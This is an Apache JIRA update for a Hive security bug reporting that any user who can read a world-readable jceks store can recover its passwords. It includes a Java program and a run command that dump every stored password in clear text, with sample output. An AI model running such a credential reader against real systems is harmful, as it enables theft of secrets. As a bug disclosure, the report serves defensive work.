[ 
https://issues.apache.org/jira/browse/HIVE-19746?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Oleksiy Sayankin updated HIVE-19746:
------------------------------------
    Description: 
This simple program can read any password from any {{jceks}} file:

{code}
package com.test.app;

import java.util.List;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.security.alias.CredentialProvider;
import org.apache.hadoop.security.alias.CredentialProviderFactory;

import java.io.IOException;

/**
 * Demonstrates that a caller who can read a {@code jceks} credential store can
 * recover every secret in it in clear text through the ordinary Hadoop
 * {@link CredentialProvider} API; nothing beyond read access to the store file
 * is required by this listing.
 *
 * Usage: {@code PasswordReader <credential-provider-path>}, where the argument is
 * a provider URI such as {@code jceks://hdfs/...}.
 */
public class PasswordReader {
  /**
   * Entry point: lists every alias in the first configured provider together
   * with its resolved password.
   *
   * @param args {@code args[0]} is the credential provider path to read from
   * @throws IOException if the provider cannot be loaded or an alias cannot be resolved
   * @throws IllegalArgumentException if no provider path is supplied
   */
  public static void main(String[] args) throws IOException {
    if (args == null || args.length == 0){
      throw new IllegalArgumentException("Credential provider path is to set");
    }
    String credentialProviderPath = args[0];
    Configuration configuration = new Configuration();
    // Point the Configuration at the given store so that getPassword(alias)
    // below resolves aliases through it rather than through plain config keys.
    configuration.set(CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH, 
credentialProviderPath);
    // Only the first provider on the path is consulted; a path naming several
    // providers would need iteration over the whole list.
    CredentialProvider credentialProvider = 
CredentialProviderFactory.getProviders(configuration).get(0);
    List<String> aliases = credentialProvider.getAliases();
    for(String alias : aliases){
      // NOTE(review): the password comes back as a char[] and is copied into an
      // immutable String that cannot be zeroed, then written to stdout in clear
      // text -- acceptable for a demonstration, not for real tooling.
      System.out.println(alias + " = " + new 
String(configuration.getPassword(alias)));
    }
  }
}
{code}

{code}
# Runs the reader with the Hadoop classpath against the metastore credential
# store; it succeeds for any account that is allowed to read that file.
java -cp $(hadoop classpath):password-reader.jar com.test.app.PasswordReader  
jceks://hdfs/user/hive/hivemetastore.jceks
{code}

*RESULT*

{code}
javax.jdo.option.connectionpassword = 123456
{code}

File {{jceks://hdfs/user/hive/hivemetastore.jceks}} has {{\-rw\-r\-\-r\-\-}} 
permissions and {{hdfs:hdfs}} owner:group. We can't remove the world-readable 
permissions here, because Hive is configured for impersonation to allow users 
other than {{hdfs}} to connect to HiveServer2. When I removed the world-readable 
permissions and tried to connect as another user, I got the following exception:

{code}
2018-05-31T10:08:40,191 ERROR [pool-7-thread-41] fs.Inode: Marking failure for: 
/user/hive/hivemetastore.jceks, error: Input/output error
2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] fs.Inode: Throwing exception 
for: /user/hive/hivemetastore.jceks, error: Input/output error
2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] metastore.RetryingHMSHandler: 
java.lang.RuntimeException: Error getting metastore password: null
    at 
org.apache.hadoop.hive.metastore.ObjectStore.getDataSourceProps(ObjectStore.java:485)
    at 
org.apache.hadoop.hive.metastore.ObjectStore.setConf(ObjectStore.java:279)
{code}

Any ideas on how to protect these passwords?

  was:
This simple program allows to read any password from any {{jceks}} file:

{code}
package com.test.app;

import java.util.List;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.security.alias.CredentialProvider;
import org.apache.hadoop.security.alias.CredentialProviderFactory;

import java.io.IOException;

public class PasswordReader {
  public static void main(String[] args) throws IOException {
    if (args == null || args.length == 0){
      throw new IllegalArgumentException("Credential provider path is to set");
    }
    String credentialProviderPath = args[0];
    Configuration configuration = new Configuration();
    configuration.set(CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH, 
credentialProviderPath);
    CredentialProvider credentialProvider = 
CredentialProviderFactory.getProviders(configuration).get(0);
    List<String> aliases = credentialProvider.getAliases();
    for(String alias : aliases){
      System.out.println(alias + " = " + new 
String(configuration.getPassword(alias)));
    }
  }
}
{code}

{code}
java -cp $(hadoop classpath):password-reader.jar com.test.app.PasswordReader  
jceks://hdfs/user/hive/hivemetastore.jceks
{code}

*RESULT*

{code}
javax.jdo.option.connectionpassword = 123456
{code}

File {{jceks://hdfs/user/hive/hivemetastore.jceks}} has {{\-rw\-r\-\-r\-\-}} 
permissions and {{hdfs:hdfs}} owner:group. We can't remove world readable 
permissions here, because Hive is configured for impersonation to allow users 
user than {{hdfs}} connect to HiveServer2. When removed world readable 
permissions I got the exception:

{code}
2018-05-31T10:08:40,191 ERROR [pool-7-thread-41] fs.Inode: Marking failure for: 
/user/hive/hivemetastore.jceks, error: Input/output error
2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] fs.Inode: Throwing exception 
for: /user/hive/hivemetastore.jceks, error: Input/output error
2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] metastore.RetryingHMSHandler: 
java.lang.RuntimeException: Error getting metastore password: null
    at 
org.apache.hadoop.hive.metastore.ObjectStore.getDataSourceProps(ObjectStore.java:485)
    at 
org.apache.hadoop.hive.metastore.ObjectStore.setConf(ObjectStore.java:279)
{code}

Any ideas how to protect passwords?


> Hadoop credential provider allows to read passwords
> ---------------------------------------------------
>
>                 Key: HIVE-19746
>                 URL: https://issues.apache.org/jira/browse/HIVE-19746
>             Project: Hive
>          Issue Type: Bug
>          Components: Security
>            Reporter: Oleksiy Sayankin
>            Assignee: Oleksiy Sayankin
>            Priority: Blocker
>
> This simple program allows to read any password from any {{jceks}} file:
> {code}
> package com.test.app;
> import java.util.List;
> import org.apache.hadoop.conf.Configuration;
> import org.apache.hadoop.security.alias.CredentialProvider;
> import org.apache.hadoop.security.alias.CredentialProviderFactory;
> import java.io.IOException;
> public class PasswordReader {
>   public static void main(String[] args) throws IOException {
>     if (args == null || args.length == 0){
>       throw new IllegalArgumentException("Credential provider path is to 
> set");
>     }
>     String credentialProviderPath = args[0];
>     Configuration configuration = new Configuration();
>     configuration.set(CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH, 
> credentialProviderPath);
>     CredentialProvider credentialProvider = 
> CredentialProviderFactory.getProviders(configuration).get(0);
>     List<String> aliases = credentialProvider.getAliases();
>     for(String alias : aliases){
>       System.out.println(alias + " = " + new 
> String(configuration.getPassword(alias)));
>     }
>   }
> }
> {code}
> {code}
> java -cp $(hadoop classpath):password-reader.jar com.test.app.PasswordReader  
> jceks://hdfs/user/hive/hivemetastore.jceks
> {code}
> *RESULT*
> {code}
> javax.jdo.option.connectionpassword = 123456
> {code}
> File {{jceks://hdfs/user/hive/hivemetastore.jceks}} has {{\-rw\-r\-\-r\-\-}} 
> permissions and {{hdfs:hdfs}} owner:group. We can't remove world readable 
> permissions here, because Hive is configured for impersonation to allow users 
> user than {{hdfs}} connect to HiveServer2. When removed world readable 
> permissions and tried to connect as other user, I got the exception:
> {code}
> 2018-05-31T10:08:40,191 ERROR [pool-7-thread-41] fs.Inode: Marking failure 
> for: /user/hive/hivemetastore.jceks, error: Input/output error
> 2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] fs.Inode: Throwing exception 
> for: /user/hive/hivemetastore.jceks, error: Input/output error
> 2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] 
> metastore.RetryingHMSHandler: java.lang.RuntimeException: Error getting 
> metastore password: null
>     at 
> org.apache.hadoop.hive.metastore.ObjectStore.getDataSourceProps(ObjectStore.java:485)
>     at 
> org.apache.hadoop.hive.metastore.ObjectStore.setConf(ObjectStore.java:279)
> {code}
> Any ideas how to protect passwords?


